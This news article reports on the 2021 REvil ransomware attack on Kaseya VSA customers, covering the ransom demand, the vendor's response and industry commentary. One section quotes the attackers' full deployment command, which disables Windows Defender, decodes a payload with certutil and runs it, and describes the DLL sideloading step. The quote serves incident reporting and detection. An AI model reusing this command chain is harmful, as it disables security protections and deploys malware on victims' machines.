Kaseya customers have been hit by a major ransomware attack that started on Friday afternoon. The attack is being blamed on REvil (also known as Sodinokibi), which also attacked JBS SA in May. The attack has impacted over 30 Managed Services Providers (MSPs) worldwide. Each of those MSPs has hundreds of customers, many of whom are now infected. The number of affected companies already exceeds 1,000.
REvil has already issued its demands for unlocking. It wants US $70 million for a universal decryptor. It will unlock what REvil claims is over 1 million computers that are already infected. Many of those machines will be desktops and laptops. However, few companies will have effective backups and be able to restore those machines. Of bigger concern will be any data that may have been exfiltrated.
A speedy response to the attack
Reaction to the attack was swift. In cybersecurity forums, people reported that the Electricity Information Sharing and Analysis Centre (E-ISAC) issued an alert Friday afternoon telling companies to shut off any Kaseya VSA servers to prevent infection. Other alerts have come in since, including from Huntress Labs, who has been tracking the attack on Reddit. Details of the attack and the current state can be found in the Reddit r/msp group.
John Hammond, Senior Cybersecurity Researcher, Huntress Labs, has also been updating a blog detailing the state of the attack. It currently plans to update details in a live webinar on Tuesday, July 6 at 1pm ET (registration required).
Kaseya has been proactive in dealing with the attacks. It engaged with Huntress Labs on Friday afternoon and quickly shut down all its Software as a Service (SaaS) servers. However, it continues to say that those servers are not believed to have been infected. Instead, the attack targeted on-premises customers. They have been told to shut down all their VSA servers until a patch and remediation process is established.
Updates from Kayesa can be found here. The most up to date, as of writing, was at 11:00am ET on July 4. In it, Kayesa states: “Kaseya’s VSA product has unfortunately been the victim of a sophisticated cyberattack. Due to our teams’ fast response, we believe that this has been localized to a very small number of on-premises customers only.”
How did the attack happen?
What we know at present comes from Huntress Labs. It has posted the following:
On July 2, around 11:00 ET, many Kaseya VSA servers were used to deploy ransomware. Here are the details of that initial intrusion:
Ransomware encryptors were dropped to Kaseya’s TempPath with the file name agent.exe. This appears to be c:\kworking\agent.exe by default and may configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\<unique id>
The VSA procedure used to deploy the encryptor was named “Kaseya VSA Agent Hot-fix”. Additional procedures were “Archive and Purge Logs” (screenshot here)
The “Kaseya VSA Agent Hot-fix” procedure ran the following: “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path “c:\Windows” to perform DLL sideloading.
The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter which contains several registry values that store encryptor runtime keys/configurations artifacts.
What happens next?
Kaseya has already released a Compromise Detection Tool that customers can request by email. Around 900 customers have done so, and it would be a surprise if all customers don’t download it. Only at that point will the size and scope of this attack be fully understood.
Importantly, Kaseya says that its R&D department has been able to replicate the attack vector. That is allowing it to develop a mitigation to the attack. It expects to have completed and tested that by sometime on Tuesday, July 6. After that, it will be deploying it to customers.
On Sunday, a press release from eSentire drew a parallel with a 2018 incident that also affected Kaseya. That incident saw cybercriminals trying to deploy Monero mining malware. According to Eldon Sprickerhoff, eSentire Chief Innovator Officer and founder: “This current attack could very well be just a variation on the same attack tactic they used in 2018 which we discovered.”
Sprickerhof continued: “Companies definitely want to check if the Sodin ransomware dropper has already been pushed to their computer systems. As recommended by Kaseya, it is a good idea at this time to disable the VSA Server until a patch has been formally released, however, your security team definitely also needs to check for indicators that the Sodin ransomware dropper or the ransomware hasn’t already been installed onto your computer systems, and that external attackers don’t have already have access to your organization.”
Enterprise Times: What does this mean?
This is yet another supply chain attack where an attack against a vendor impacts large numbers of businesses. In this case, the initial attack seems to have been MSPs, which has led to thousands of other victims. At present, we don’t know how bad it is for those customers of the MSPs and may not know until sometime later this week.
It is a holiday weekend in the US, and many companies will have dodged a bullet. Had this attack occurred Friday night, then the attack would have had a much easier time replicating. That is because most organisations would have had just skeleton staff over the long weekend. The attack was noticed quickly, which has probably prevented a much more severe instance.
Despite Kaseya being the root cause here, it has responded quickly to identify and develop a solution. The patch should be available by Tuesday, and the company hopes to have restarted its SaaS servers by then as well. At that point, companies can start to establish just how badly affected they have been by this attack and begin to recover.
Perhaps the key question is will Kaseya pay for the universal decryptor? Will its customers offer to help fund any payment? With the US hardening its stance against ransomware payments, will there be pressure on Kaseya to not pay? The next few days will be interesting.